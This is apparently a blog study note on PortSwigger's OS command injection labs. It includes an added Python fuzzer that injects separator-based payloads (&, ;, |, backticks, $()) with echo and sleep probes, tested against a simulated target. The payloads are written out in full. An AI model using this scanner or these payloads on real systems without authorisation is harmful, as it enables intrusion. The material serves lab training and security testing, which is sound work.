Another quick section – I would do this section second (after the Directory Traversal section). The content and labs were closely matched again – the only caveat to that would be that you should really scroll down to the bottom section covering ways of injecting OS commands before going to the labs. The first part only introduces & as a method of command injection, and the additional methods covered will be really helpful.
The approach to command injection is similar – test all the things, try different options, and automate where possible. Outside of the labs, you would want to try different payloads to see what’s there. The labs are very doable with the Community version. Where Burp Collaborator is used, you can do the interaction portion by using a dummy URL, but you can’t do the exfiltration portion.
Scripting was important for me for these labs. They gave me the opportunity to figure out some additional things with Python (looping through dictionaries, tweaking values, and reverting them). Looking toward real-world usage of the script, I also figured out how to build dictionaries on the fly based on user input. Not the most secure practice, but it served a purpose.
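To make the two points above concrete (the separators beyond & that the bottom of the PortSwigger section covers, and a script that loops over a dictionary of request parameters, swaps one value in, and restores everything else), here is an added example of that kind of fuzzer. It is my illustration, not the author's script and not PortSwigger's code. The target is a constructed stand-in (a hypothetical feedback form whose `email` parameter is interpolated into a `mail` command) so the block runs offline; against a real lab you would replace `visible_target`/`blind_target` with a function that sends the request with `requests` and returns the body and the elapsed time.

```python
"""Parameter fuzzer for OS command injection (added example, not the author's
script). The HTTP client is supplied by the caller as a `send` callable, so the
logic here runs offline against the constructed stand-in at the bottom."""
import re
import secrets
from typing import Callable, Dict, List, Tuple

# Shell metacharacters that terminate or chain commands. "\n" (0x0a) works on
# Unix and Windows; backticks and $() are Unix-only inline execution, useful
# when the injection point sits inside a string the separators would not break.
SEPARATORS = ["&", "&&", "|", "||", ";", "\n"]
INLINE_FORMS = ["`{cmd}`", "$({cmd})"]

Sender = Callable[[Dict[str, str]], Tuple[str, float]]


def build_payloads(original: str, cmd: str) -> List[str]:
    """Injection strings that keep `original` in front so the application's
    own command still parses. Each separator is tried bare and wrapped in
    quotes, for injection points that sit inside single or double quotes."""
    payloads = []
    for sep in SEPARATORS:
        core = f"{sep}{cmd}{sep}"          # trailing separator cuts off any suffix
        payloads.append(f"{original}{core}")
        payloads.append(f"{original}'{core}'")
        payloads.append(f'{original}"{core}"')
    for form in INLINE_FORMS:
        payloads.append(original + form.format(cmd=cmd))
    return payloads


def with_param(params: Dict[str, str], name: str, value: str) -> Dict[str, str]:
    """Copy of `params` with one value swapped. The caller's dict is never
    modified, so every other parameter keeps its original value (the revert)."""
    mutated = dict(params)
    mutated[name] = value
    return mutated


def scan(params: Dict[str, str], send: Sender, delay: int = 10) -> List[Tuple[str, str, str]]:
    """Probe every parameter, first for reflected output, then for a time delay.

    `send(request_params)` returns (response_body, elapsed_seconds). Returns
    (parameter, technique, payload) for each parameter that responded.
    """
    marker = secrets.token_hex(6)   # unique, so a word already on the page can't false-positive
    findings = []
    for name, original in params.items():
        reflected = False
        for payload in build_payloads(original, f"echo {marker}"):
            body, _ = send(with_param(params, name, payload))
            if marker in body:
                findings.append((name, "echo", payload))
                reflected = True
                break
        if reflected:
            continue
        # Blind case: output never comes back, so look for a delay instead.
        for payload in build_payloads(original, f"sleep {delay}"):
            _, elapsed = send(with_param(params, name, payload))
            if elapsed >= delay:
                findings.append((name, "time", payload))
                break
    return findings


# --- Constructed stand-in for the target (hypothetical feedback form) --------
def _simulate(req: Dict[str, str], reflect_output: bool) -> Tuple[str, float]:
    """Pretend backend that interpolates `email` into a shell command unescaped
    and 'runs' only echo and sleep. Purely a test double for the scanner."""
    shell_line = f"mail -s feedback {req['email']} < body.txt"
    body, elapsed = "Thank you for your feedback", 0.2
    for part in re.split(r"[&|;\n]+", shell_line):
        if (m := re.match(r"\s*echo (\S+)", part)) and reflect_output:
            body += "\n" + m.group(1)
        if m := re.match(r"\s*sleep (\d+)", part):
            elapsed += int(m.group(1))
    return body, elapsed


def visible_target(req: Dict[str, str]) -> Tuple[str, float]:
    return _simulate(req, reflect_output=True)


def blind_target(req: Dict[str, str]) -> Tuple[str, float]:
    return _simulate(req, reflect_output=False)


if __name__ == "__main__":
    form = {"name": "bob", "email": "bob@example.com"}   # constructed sample request
    print(scan(form, visible_target))   # email hit via echo, e.g. 'bob@example.com&echo <marker>&'
    print(scan(form, blind_target))     # [('email', 'time', 'bob@example.com&sleep 10&')]
```

Two practical notes. The time-based check is the noisy one: network jitter can push a slow response past the threshold, so confirm a hit by re-running it with a different delay value before reporting it. And the out-of-band technique the labs use with Burp Collaborator is just a third probe in the same loop, with `nslookup <unique-subdomain>` as the command and a DNS log as the oracle, which is why the Community version can show you the interaction but not the exfiltrated output.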
Definitely take a look at the associated chapter in the Web Application Hacker’s Handbook if you have it, as well as the OWASP Command Injection page. Otherwise, get through this section and move on.